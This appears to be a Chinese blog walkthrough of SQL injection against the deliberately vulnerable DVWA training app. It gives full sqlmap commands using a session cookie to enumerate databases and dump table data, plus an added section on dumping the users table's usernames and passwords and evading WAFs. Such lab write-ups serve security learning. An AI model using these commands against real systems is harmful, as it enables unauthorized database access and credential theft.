dvwa-sql注入high级别sqlmap使用(自制任务)

这篇博客详细记录了一次SQL注入攻击的过程。在高安全级别下,利用cookie信息,针对10.12.202.4/dvwa/vulnerabilities/sqli/的页面,通过sqlmap工具尝试列举数据库、查看当前数据库、获取表名以及提取特定表(locations)的字段(纬度、经度、建筑名称)数据。这个过程揭示了网站的安全漏洞和敏感信息的潜在风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在high安全级别下,我们能够看到进行了一次页面跳转
在这里插入图片描述
使用cookie插件获取cookie信息
在这里插入图片描述

--cookie="4a80203698ca9007ed3373a065349ddd;security=high"

此时用户提交网站为10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php

-u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php"

实际要注入的网站为http://10.12.202.4/dvwa/vulnerabilities/sqli/

--second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/"

用户提交的数据为

--data="id=1&Submit=Submit"

构造完成,尝试列出所有数据库(–batch全自动,不会要求输入y/n)

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" --dbs --batch

在这里插入图片描述
查看目前数据库

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –current-db --batch

查看当前数据库下所有表名

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –tables -D "dvwa" --batch

在这里插入图片描述
发现locations
列出此表所有字段

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –columns -T "locations" -D "dvwa" --batch

在这里插入图片描述

获得维度

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "latitude" --batch

在这里插入图片描述
获得经度

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "longtitude" --batch

在这里插入图片描述
获得建筑名称

sqlmap -u "10.12.202.4/dvwa/vulnerabilities/sqli/session-input.php" --second-url "http://10.12.202.4/dvwa/vulnerabilities/sqli/" --cookie="PHPSESSID=4a80203698ca9007ed3373a065349ddd;security=high" --data="id=1&Submit=Submit" –dump -T "locations" -D "dvwa"  -C "name" --batch

在这里插入图片描述

### 使用Sqlmap针对DVWA Medium Level SQL Injection进行渗透测试 对于DVWA中的SQL注入漏洞,在中等安全级别下,可以利用`sqlmap`工具来进行自动化检测和数据提取。为了成功实施这一过程,确保设置正确的参数来匹配目标环境的要求。 #### 准备工作 在启动`sqlmap`之前,先要访问DVWA页面并登录,调整安全性等级至Medium。接着通过浏览器开发者工具捕获请求,从中复制带有有效会话ID(`PHPSESSID`)的Cookie值[^2]。 #### 构建命令行指令 构建用于发起攻击的命令如下所示: ```bash sqlmap -u "http://<target-ip>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" \ --cookie="PHPSESSID=<your-session-id>;security=medium" \ --dbms=mysql --technique=E --level=5 --risk=3 --random-agent ``` 此命令指定了URL路径、必要的Cookies以及数据库管理系统类型(MySQL),同时还设置了技术选项(Technique)为基于错误(Error-based)的方式,并提高了扫描强度(Level)与风险(Risk)- `-u`: 指定目标网址。 - `--cookie`: 提供必需的身份验证信息。 - `--dbms`: 明确指出使用的DBMS种类以便更精确地探测。 - `--technique=E`: 采用基于错误的技术进行尝试。 - `--level=5`: 设置详细的测试水平。 - `--risk=3`: 增加潜在危险操作的可能性。 - `--random-agent`: 随机更改User-Agent头以规避某些防护机制。 #### 获取敏感信息 一旦确认存在可利用的漏洞,可以通过附加更多参数进一步挖掘有价值的数据,比如枚举表名或列名甚至导出具体记录。例如,想要查看名为`users`表格的内容,则追加相应选项: ```bash -D dvwa -T users -C username,password --dump ``` 这将指示`sqlmap`连接到指定数据库(Dvwa),定位特定表(Users)及其字段(User,Password),最后输出所有条目。 #### 注意事项 在整个过程中务必遵守法律法规,仅限于授权范围内开展此类活动。此外,考虑到实际环境中可能存在的防御措施(如WAF),适当调节配置项有助于提高成功率的同时减少被发现的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值